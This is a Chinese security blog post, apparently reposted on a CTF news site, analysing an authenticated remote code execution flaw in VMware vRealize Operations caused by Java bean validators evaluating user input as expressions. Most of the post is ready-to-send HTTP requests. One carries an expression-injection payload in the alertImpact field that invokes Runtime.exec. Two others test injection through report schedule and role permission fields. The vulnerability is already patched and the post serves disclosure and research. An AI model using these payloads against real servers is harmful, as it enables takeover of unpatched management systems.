CTF导航 CTF导航

VMware vROPS RCE of java bean

渗透技巧 10个月前 admin
52 0 0
系列 – vmware

官方已经发布漏洞补丁 https://www.vmware.com/security/advisories/VMSA-2023-0009.html 公开文章

# 前言

这个漏洞是看了mr_me的文章之后 https://trenchant.io/vmware-workspace-one-access/ 顺手看了看vROPS,发现也存在这个漏洞,于是有此文,漏洞比较简单,下面简单写一下。这是一个授权后的RCE漏洞。

# 漏洞分析

com.vmware.ops.api.model.validation.AlertQueryValidator

 

VMware vROPS RCE of java bean

 

向上回溯,该验证器的注解为AlertQueryValidate

 

VMware vROPS RCE of java bean

 

该注解被用在com.vmware.ops.api.model.alerts.AlertQuery实体类上,找该实体类在哪用到了即可

 

VMware vROPS RCE of java bean

 

com.vmware.ops.api.server.controller.AlertControllers.AlertQueryAndManagementController#queryAlert

1
2
3
4

public Alert.Alerts queryAlert(@BodyRequest(value = "The alertQuery criteria",required = true,examples = @Example({@ExampleProperty("StubFactory#alertQuery")})) @RequestBody @Valid AlertQuery alertQuery) {
    this.logger.info("Alert query = " + alertQuery);
    return this.alertService.queryForAlerts(alertQuery);
}

典中典写法,exp如下

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60

POST /suite-api/api/alerts/query?page=1&pageSize=1000&_no_links=true HTTP/2
Host: 192.168.1.166
Content-Length: 1032
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: vRealizeOpsToken 762927f0-2266-4734-ada9-84fcc4b67feb::c65bf5b6-812f-45e5-bf4e-2ea405c4fca7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.166
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.166/suite-api/doc/swagger-ui.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6

{
    "compositeOperator": "AND",
    "resource-query": {
        "name": [
            "Windows2017V1M",
            "Windows2018VM"
        ],
        "regex": [
            "\\\\S+-BNA-\\\\S+",
            null
        ],
        "adapterKind": [
            "VMWARE"
        ],
        "resourceKind": [
            "HostSystem"
        ],
        "resourceId": [
            "9400ffc4-8ebb-4c43-a356-dd70b378124b"
        ],
        "statKeyInclusive": true
    },
    "alertImpact": [
        "a${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'touch /tmp/asd')}"
    ],
    "activeOnly": true,
    "alertCriticality": [
        "CRITICAL",
        "IMMEDIATE",
        "WARNING",
        "INFORMATION"
    ],
    "startTimeRange": {
        "startTime": 1677826944,
        "endTime": 1677836944
    },
    "includeChildrenResources": true,
    "extractOwnerName": false
}

 

VMware vROPS RCE of java bean

 

如此还能找到很多

com.vmware.ops.api.model.validation.ReportScheduleValidator

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

POST /suite-api/api/reportdefinitions/c5035738-f909-474e-8ae0-4c5429ff384f/schedules?_no_links=true HTTP/2
Host: 192.168.1.166
Content-Length: 477
Sec-Ch-Ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: vRealizeOpsToken 762927f0-2266-4734-ada9-84fcc4b67feb::65e1c585-1111-473b-884d-f022cd1b8e06
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Vrealizeops-Api-Timezone: GMT
Content-Type: application/json
Accept: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.166
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.166/suite-api/doc/swagger-ui.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6

{
  "reportDefinitionId" : "63925ab5-5dd8-4b6d-b50b-1f9e2936e91f",
  "resourceId" : [ "5715b47f-ebf6-4d58-a2f7-019fb8506a78" ],
  "traversalSpec" : {
    "name" : "Traversal spec name",
    "rootAdapterKindKey" : "VMWARE",
    "rootResourceKindKey" : "VM",
    "adapterInstanceAssociation" : false
  },
  "startDate" : "4/30/15 ${99-2}",
  "reportScheduleType" : "WEEKLY",
  "daysOfTheWeek" : [ "SUNDAY", "MONDAY" ],
  "startHour" : 1,
  "startMinute" : 0,
  "recurrence" : 2
}

 

VMware vROPS RCE of java bean

 

com.vmware.ops.api.model.validation.RolePermissionValidator

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

PUT /suite-api/api/auth/users/5c57c63e-bc16-4f81-9309-5d7f1369bfe7/permissions?_no_links=true HTTP/2
Host: 192.168.1.166
Content-Length: 88
Sec-Ch-Ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Authorization: vRealizeOpsToken 762927f0-2266-4734-ada9-84fcc4b67feb::65e1c585-1111-473b-884d-f022cd1b8e06
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.1.166
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.166/suite-api/doc/swagger-ui.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6

{"traversal-spec-instances":[{"adapterKind":"a${99-12}"},{"adapterKind":"a${99-12}"}]}

 

VMware vROPS RCE of java bean

 

# 总结

捡的漏洞罢了

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。

原文始发于Y4er:VMware vROPS RCE of java bean

版权声明:admin 发表于 2024年1月13日 上午11:37。
转载请注明:VMware vROPS RCE of java bean | CTF导航

相关文章

漏洞复现 微议管理系统后台文件上传漏洞
admin
501
Microsoft Windows Defender / Trojan.Win32/Powessere.G – Detection Mitigation Bypass
admin
53
G.O.S.S.I.P 阅读推荐 2024-05-31 在野CAPTCHA攻击研究
admin
77
Day 2 | 最嚣张的10个CS登场,IOC附上
admin
1,372
利用DNS A记录执行Shellcode
admin
888
每周蓝军技术推送(2023.4.1-4.7)
admin
349

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0